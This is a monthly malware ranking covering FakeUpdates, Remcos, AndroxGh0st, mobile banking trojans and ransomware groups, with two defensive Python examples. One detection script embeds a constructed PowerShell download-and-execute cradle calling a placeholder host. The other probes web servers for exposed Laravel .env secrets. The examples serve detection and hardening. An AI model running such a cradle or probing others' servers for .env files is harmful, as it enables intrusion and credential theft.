Malware Rankings for April: FakeUpdates Remains the Dominant Malware in Germany

Check Point Security Researchers Uncover Multi-Stage Malware Campaigns That Use Legitimate Processes for Camouflage
Security researchers have uncovered a sophisticated multi-stage malware campaign distributing AgentTesla, Remcos, and Xloader. The attack begins with phishing emails disguised as order confirmations that trick victims into opening a malicious 7-Zip archive. The archive contains a JScript Encoded (.JSE) file that launches a Base64-encoded PowerShell script, which in turn executes a second-stage .NET or AutoIt-based executable. The final payload is injected into legitimate Windows processes such as RegAsm.exe or RegSvcs.exe, which makes it considerably harder to detect because the malicious code then runs under the name of a trusted .NET Framework utility rather than as a separate, unknown executable.
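Each stage of the chain described above leaves a process-creation event that a defender can match on: a script host running a .jse file, PowerShell launched with an encoded command (and by a script host), and RegAsm.exe or RegSvcs.exe started by something other than a build or installer tool. The following is an added example written for this page, not Check Point's tooling; it runs three such rules over constructed, hypothetical Sysmon-style events (parent image, image, command line), decodes the -EncodedCommand payload (UTF-16LE before Base64, which is what PowerShell expects), and treats the list of legitimate RegAsm parents as an assumption to tune per environment.

```python
"""Hunt for the delivery chain above in process-creation telemetry.

Added example, not Check Point's code. Events are simplified, hypothetical
Sysmon Event ID 1 style records (ParentImage, Image, CommandLine); the
sample events, paths and payload below are constructed for illustration.
"""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INJECTION_TARGETS = {"regasm.exe", "regsvcs.exe"}
# Parents that legitimately launch RegAsm/RegSvcs (assumption: tune to your estate).
EXPECTED_PARENTS = {"msbuild.exe", "devenv.exe", "msiexec.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed second-stage command; -EncodedCommand payloads are UTF-16LE, then Base64.
STAGE2_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENC_PAYLOAD = base64.b64encode(STAGE2_COMMAND.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\7-Zip\7zFM.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\order_confirmation.jse"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + ENC_PAYLOAD},
    {"ParentImage": r"C:\Users\alice\AppData\Local\Temp\stage2.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    # Benign: RegAsm launched by the build engine, which is in EXPECTED_PARENTS.
    {"ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"RegAsm.exe /codebase MyComponent.dll"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """List the suspicious traits of one event (an empty list means nothing flagged)."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    findings = []
    if image in SCRIPT_HOSTS and re.search(r"\.jse?\b", cmd, re.I):
        findings.append("script host running a .js/.jse file")
    if image in POWERSHELL:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded PowerShell: " + decoded[:60])
        if parent in SCRIPT_HOSTS:
            findings.append("PowerShell spawned by " + parent)
    if image in INJECTION_TARGETS and parent not in EXPECTED_PARENTS:
        findings.append(image + " launched by unexpected parent " + parent)
    return findings


def scan(events):
    """Return (index, findings) for every event that triggered at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        f = classify(ev)
        if f:
            hits.append((i, f))
    return hits


if __name__ == "__main__":
    for i, f in scan(SAMPLE_EVENTS):
        print(i, basename(SAMPLE_EVENTS[i]["Image"]), f)
```

The three rules are deliberately independent so that a single hit (for instance an encoded command with no visible .jse stage, because the archive was opened from a different file manager) still surfaces; correlating them by process tree within a short window is the natural next step in a SIEM. The RegAsm rule will produce noise on developer workstations until EXPECTED_PARENTS reflects the local build tooling.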
These findings reflect a striking trend in cybercrime: the convergence of commercially available malware and advanced techniques. Tools like AgentTesla and Remcos, once openly and cheaply sold, are now integrated into complex delivery chains that mimic the tactics of state-sponsored actors, blurring the lines between financially and politically motivated threats.
Top Malware in Germany
The arrows indicate changes in ranking compared to the previous month.
↔ FakeUpdates (3.35%)
FakeUpdates, also known as SocGholish, is a downloader malware first discovered in 2018. It is spread via drive-by downloads on compromised or malicious websites and prompts users to install a fake browser update. FakeUpdates has been linked to the Russian hacker group Evil Corp and is used to deliver various secondary payloads after the initial infection.
↑ Remcos (2.69%)
Remcos is a Remote Access Trojan (RAT) first identified in 2016. It is commonly spread through malicious documents in phishing campaigns. Designed to bypass Windows security features such as User Account Control (UAC), it executes malware with elevated privileges, making it a versatile tool for attackers.
↓ Androxgh0st (2.43%)
AndroxGh0st is a Python-based malware that targets applications using the Laravel PHP framework. It scans for unprotected .env files that contain sensitive data such as credentials for AWS, Twilio, Office 365, and SendGrid. The malware uses a botnet to identify websites running Laravel and steals confidential information. Once access is gained, attackers can deploy additional malware, establish backdoor connections, and exploit cloud resources for activities such as cryptocurrency mining.
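The exposure AndroxGh0st looks for is trivial to check for on one's own hosts before a botnet does: request /.env from the web root and see whether the body is a dotenv file rather than an error page. The following is an added example for this page, not the malware's scanner and not Check Point's code. It classifies an HTTP response offline (status, content type, body) and lists which sensitive keys would have leaked, without ever returning the values themselves, so the output is safe to log. The sample body and the list of key prefixes are constructed for the example; the only real fix is to keep .env outside the document root or to deny dotfiles in the web server configuration.

```python
"""Classify an HTTP response as a leaked Laravel .env and name the exposed keys.

Added example, not the malware's code. Run only against hosts you are
authorised to test. The sample body below is constructed with placeholder
secrets; the key prefixes are an assumption drawn from what the text says
AndroxGh0st harvests (AWS, Twilio, Office 365, SendGrid) plus Laravel basics.
"""
import re
import urllib.request

SENSITIVE_PREFIXES = ("APP_KEY", "DB_PASSWORD", "AWS_", "TWILIO_",
                      "SENDGRID_", "MAIL_PASSWORD", "OFFICE365_")
LARAVEL_MARKERS = ("APP_KEY", "APP_ENV", "APP_NAME", "DB_CONNECTION")
ENV_LINE = re.compile(r"^\s*(?:export\s+)?([A-Z][A-Z0-9_]*)=(.*)$")

# Constructed sample of what a misconfigured server would return for GET /.env
SAMPLE_ENV_BODY = "\n".join([
    "APP_NAME=Laravel",
    "APP_ENV=production",
    "APP_KEY=base64:PLACEHOLDER-NOT-A-REAL-KEY",
    "# database",
    "DB_CONNECTION=mysql",
    "DB_PASSWORD=placeholder",
    "AWS_ACCESS_KEY_ID=AKIA-PLACEHOLDER",
    "AWS_SECRET_ACCESS_KEY=placeholder-secret",
    "SENDGRID_API_KEY=",
    'MAIL_PASSWORD="quoted-placeholder"',
])


def parse_env(body):
    """Map KEY -> VALUE for dotenv-style lines; comments and blanks are ignored."""
    found = {}
    for line in body.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = ENV_LINE.match(line)
        if m:
            found[m.group(1)] = m.group(2).strip().strip('"').strip("'")
    return found


def is_exposed_env(status, content_type, body, min_keys=3):
    """True when the response looks like a served .env rather than an error page.

    Requires HTTP 200, a non-HTML content type, at least min_keys assignments
    and at least one Laravel marker key, to keep false positives down.
    """
    if status != 200 or "text/html" in content_type.lower():
        return False
    env = parse_env(body)
    if len(env) < min_keys:
        return False
    return any(k in env for k in LARAVEL_MARKERS)


def exposed_secrets(body):
    """Sorted names of sensitive keys with non-empty values (values are never returned)."""
    env = parse_env(body)
    return sorted(k for k, v in env.items() if v and k.startswith(SENSITIVE_PREFIXES))


def check_host(base_url, timeout=5):
    """Fetch base_url + '/.env' and report (exposed, keys). Network use; hypothetical helper."""
    req = urllib.request.Request(base_url.rstrip("/") + "/.env",
                                 headers={"User-Agent": "env-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", errors="replace")
            ctype = resp.headers.get("Content-Type", "")
            status = resp.status
    except urllib.error.HTTPError as e:
        status, ctype, body = e.code, e.headers.get("Content-Type", ""), ""
    exposed = is_exposed_env(status, ctype, body)
    return exposed, (exposed_secrets(body) if exposed else [])


if __name__ == "__main__":
    print(is_exposed_env(200, "text/plain", SAMPLE_ENV_BODY), exposed_secrets(SAMPLE_ENV_BODY))
```

Servers that return a 200 with a branded HTML "not found" page are the usual false-positive source, which is why the content type and the marker keys are both required. An empty value (SENDGRID_API_KEY above) is reported as not exposed, even though the file itself still should not be reachable.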
Top Mobile Malware
↔ Anubis
Anubis is a versatile banking Trojan originally developed for Android devices, now equipped with advanced features like bypassing multi-factor authentication (MFA) by intercepting SMS one-time passwords (OTPs), keylogging, audio recording, and ransomware capabilities. It is often distributed through fraudulent apps on the Google Play Store and has become one of the most widespread mobile malware families. Anubis also includes various RAT (Remote Access Trojan) functionalities, enabling extensive surveillance and control of infected systems.
↔ AhMyth
AhMyth is a remote access trojan (RAT) targeting Android devices, typically masquerading as legitimate apps such as screen recorders, games, or cryptocurrency tools. Once installed, it gains extensive permissions, allowing it to persist after a reboot and steal sensitive data including banking details, cryptocurrency wallet credentials, MFA codes, and passwords. AhMyth also supports keylogging, screen capture, access to the camera and microphone, and SMS interception, making it a powerful tool for data theft and other criminal activity.
↑ Hydra
Hydra is a banking Trojan designed to steal banking credentials by prompting victims to grant dangerous permissions every time they open a banking app.
Most Active Ransomware Groups
Akira
First reported in early 2023, Akira ransomware targets both Windows and Linux systems. It generates its symmetric key material with CryptGenRandom() and encrypts files with the ChaCha 2008 stream cipher, and it shares code similarities with the leaked Conti v2 ransomware. Akira spreads through various vectors, including infected email attachments and exploits against VPN endpoints. After infection, it encrypts data and appends the extension “.akira” to filenames. A ransom note is then displayed, demanding payment in exchange for decryption.
SatanLock
SatanLock is a new operation that has been publicly active since early April. It has disclosed 67 victims, although, as with many new players, over 65% of these had previously been targeted by other actors.
Qilin
Also known as Agenda, Qilin is a criminal ransomware-as-a-service operation that collaborates with affiliates to encrypt and steal data from compromised organizations, demanding a ransom for decryption. First discovered in July 2022, this ransomware is developed in Golang and is known for targeting large enterprises and high-value organizations, particularly in the healthcare and education sectors. Qilin typically gains access via phishing emails containing malicious links, enabling it to infiltrate networks and exfiltrate sensitive data. Once inside, it moves laterally through the victim’s infrastructure in search of valuable data to encrypt.